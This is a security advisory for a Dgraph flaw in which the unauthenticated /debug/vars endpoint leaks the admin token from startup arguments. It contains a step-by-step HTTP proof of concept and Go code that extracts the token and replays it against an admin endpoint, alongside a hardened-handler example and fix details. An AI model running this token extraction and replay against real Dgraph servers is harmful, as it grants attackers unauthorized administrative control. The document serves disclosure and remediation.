
CVE

CVE-2026-41492

Dgraph: Unauthenticated Admin Token Disclosure Leading to Authentication Bypass via /debug/vars

Summary

Dgraph v25.3.2 still exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints.

This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler.

Details

Alpha still exposes Go's default HTTP mux:

  • x/metrics.go imports expvar and initializes Conf = expvar.NewMap("dgraph_config")
  • Go's expvar package automatically registers /debug/vars on http.DefaultServeMux in its init()
  • expvar publishes:
      • cmdline = os.Args
      • memstats = runtime.MemStats (via runtime.ReadMemStats)

Alpha's HTTP handler explicitly blocks only the old CVE path:

  • dgraph/cmd/alpha/run.go checks if r.URL.Path == "/debug/pprof/cmdline" and returns 404
  • otherwise it falls through to http.DefaultServeMux.ServeHTTP(w, r)

Admin endpoints still trust the leaked token:

  • dgraph/cmd/alpha/admin.go reads X-Dgraph-AuthToken and compares it to worker.Config.AuthToken
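To make the deny-list-versus-fall-through problem concrete, here is a small Go program, an added example for this page and not Dgraph's code, that reproduces the pattern with only the standard library: one handler blocks /debug/pprof/cmdline and forwards everything else to http.DefaultServeMux, which already carries expvar's /debug/vars simply because expvar was imported; the hardened variant serves application routes from a private ServeMux. The Conf map, the /health route and the probe helper are this example's own assumptions.

```go
package main

import (
	"expvar" // the import alone makes expvar's init() register /debug/vars on http.DefaultServeMux
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
)

// Conf mirrors the expvar map described for x/metrics.go. The map is harmless
// by itself; the exposure comes from expvar's init(), which also publishes
// "cmdline" (os.Args) and "memstats" and serves them all at /debug/vars.
var Conf = expvar.NewMap("dgraph_config")

// vulnerableHandler follows the pattern described for dgraph/cmd/alpha/run.go:
// a deny-list of exactly one path, then a fall-through to the process-wide mux,
// so every other handler registered on DefaultServeMux stays reachable.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	if r.URL.Path == "/debug/pprof/cmdline" {
		http.NotFound(w, r)
		return
	}
	http.DefaultServeMux.ServeHTTP(w, r)
}

// hardenedHandler is the allow-list alternative: only routes registered on a
// private ServeMux are served, so whatever imported packages (expvar,
// net/http/pprof) put on DefaultServeMux is not exposed. /health is a stand-in route.
func hardenedHandler() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/health", func(w http.ResponseWriter, _ *http.Request) {
		io.WriteString(w, "OK")
	})
	return mux
}

// probe performs an in-process GET against a handler and returns status and body.
func probe(h http.Handler, path string) (int, string) {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	return rec.Code, rec.Body.String()
}

func main() {
	Conf.Add("cache_mb", 4096) // example config value; it shows up under "dgraph_config"
	for _, path := range []string{"/debug/pprof/cmdline", "/debug/vars", "/health"} {
		code, body := probe(http.HandlerFunc(vulnerableHandler), path)
		fmt.Printf("vulnerable %-21s -> %d, %d bytes\n", path, code, len(body))
		code, _ = probe(hardenedHandler(), path)
		fmt.Printf("hardened   %-21s -> %d\n", path, code)
	}
}
```

Running it shows the vulnerable handler answering /debug/vars with a JSON body that includes the process arguments, while the same path is a 404 on the private mux. The general rule this illustrates is that any `http.ListenAndServe(addr, nil)` or explicit fall-through to DefaultServeMux exposes every handler that any transitive import registered there, which is why a deny-list of known-bad paths cannot be made complete.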

PoC

  1. Send an unauthenticated request to Alpha:

       GET /debug/vars HTTP/1.1
       Host: target:8080

  2. Parse the JSON response and read the cmdline field.
  3. Extract the admin token from the startup arguments, for example:

       --security token=debug-vars-secret;

  4. Replay the token to an admin-only endpoint:

       GET /admin/config/cache_mb HTTP/1.1
       Host: target:8080
       X-Dgraph-AuthToken: debug-vars-secret

  5. The request is accepted as an authorized admin request.

This was reproduced against dgraph/dgraph:v25.3.2 in Docker.

Observed behavior:

  • unauthenticated /debug/vars leaked the configured token
  • replaying the leaked token in X-Dgraph-AuthToken successfully accessed /admin/config/cache_mb
  • the response body was 4096

It was also verified that only the previously reported path is patched in the same version:

  • /debug/pprof/cmdline returned 404 Not Found
  • /debug/pprof/ remained reachable
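The PoC steps above, carried out in Go against an in-process stand-in for Alpha's admin endpoint. This is an added example for this page, not Dgraph's code and not a capture from the reproduction: the /debug/vars body is constructed sample data shaped like expvar's output; tokenFromCmdline goes slightly beyond the PoC by handling both `--security <value>` and `--security=<value>` and parsing the value as a semicolon-separated superflag; adminHandler, its 401 message and the constant-time comparison are this example's own modelling of the X-Dgraph-AuthToken check, not a description of admin.go.

```go
package main

import (
	"crypto/subtle"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// varsBody is a constructed /debug/vars response for an Alpha started with
// --security "token=debug-vars-secret; whitelist=10.0.0.0/8". Sample data only.
const varsBody = `{
"cmdline": ["/usr/local/bin/dgraph","alpha","--my=alpha1:7080","--zero=zero1:5080","--security","token=debug-vars-secret; whitelist=10.0.0.0/8"],
"dgraph_config": {"cache_mb": 4096},
"memstats": {"Alloc": 123456}
}`

// tokenFromCmdline pulls the admin token out of a process argument list. It
// accepts "--security <value>" and "--security=<value>" and treats the value as
// a superflag: semicolon-separated key=value pairs, whitespace-tolerant.
func tokenFromCmdline(args []string) (string, bool) {
	for i, a := range args {
		var value string
		switch {
		case a == "--security" && i+1 < len(args):
			value = args[i+1]
		case strings.HasPrefix(a, "--security="):
			value = strings.TrimPrefix(a, "--security=")
		default:
			continue
		}
		for _, kv := range strings.Split(value, ";") {
			k, v, ok := strings.Cut(strings.TrimSpace(kv), "=")
			if ok && strings.TrimSpace(k) == "token" {
				return strings.TrimSpace(v), true
			}
		}
	}
	return "", false
}

// tokenFromVars parses a /debug/vars JSON body and extracts the token from "cmdline".
func tokenFromVars(body string) (string, bool) {
	var vars struct {
		Cmdline []string `json:"cmdline"`
	}
	if err := json.Unmarshal([]byte(body), &vars); err != nil {
		return "", false
	}
	return tokenFromCmdline(vars.Cmdline)
}

// adminHandler models an admin-only endpoint that trusts a bearer-style header:
// the request is accepted if X-Dgraph-AuthToken equals the configured token.
// The 401 text and the constant-time compare are this example's choices.
func adminHandler(configured string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("X-Dgraph-AuthToken")
		if subtle.ConstantTimeCompare([]byte(got), []byte(configured)) != 1 {
			http.Error(w, "Invalid X-Dgraph-AuthToken", http.StatusUnauthorized)
			return
		}
		fmt.Fprint(w, "4096") // stand-in for the cache_mb value returned in the write-up
	})
}

// replay sends the (possibly empty) token to the admin handler and returns status and body.
func replay(h http.Handler, token string) (int, string) {
	req := httptest.NewRequest(http.MethodGet, "/admin/config/cache_mb", nil)
	if token != "" {
		req.Header.Set("X-Dgraph-AuthToken", token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code, strings.TrimSpace(rec.Body.String())
}

func main() {
	token, ok := tokenFromVars(varsBody)
	fmt.Println("leaked token:", token, ok)
	admin := adminHandler("debug-vars-secret")
	code, body := replay(admin, token)
	fmt.Println("replay with leaked token:", code, body)
	code, _ = replay(admin, "")
	fmt.Println("request without token:", code)
}
```

Against a live target the only difference is that varsBody comes from `GET http://target:8080/debug/vars` and replay is an outbound request; the parsing and header replay are unchanged. The same extraction works on anything that echoes os.Args, which is why secrets passed on the command line should be treated as readable by every local user and by every debug endpoint, and supplied via file or environment instead.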

Impact

Unauthenticated attackers can obtain the Alpha admin token and gain unauthorized administrative access.

This enables privileged admin operations such as:

  • reading privileged admin configuration
  • mutating admin configuration
  • performing operational control actions gated by X-Dgraph-AuthToken

In deployments where the Alpha HTTP port is reachable by untrusted parties, this is a practical authentication bypass to admin functionality.

CVSS

  • Severity: Critical
  • CVSS 3.1 base score: 9.8
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


References

  • https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
  • https://nvd.nist.gov/vuln/detail/CVE-2026-41492
  • https://github.com/dgraph-io/dgraph
  • https://github.com/dgraph-io/dgraph/releases/tag/v25.3.3

Basic Information

  • Base CVSS: 9.8
  • EPSS probability: 0.00115%
  • EPSS percentile: 0.29654%
  • Introduced version: 0
  • Fix available: 25.3.3
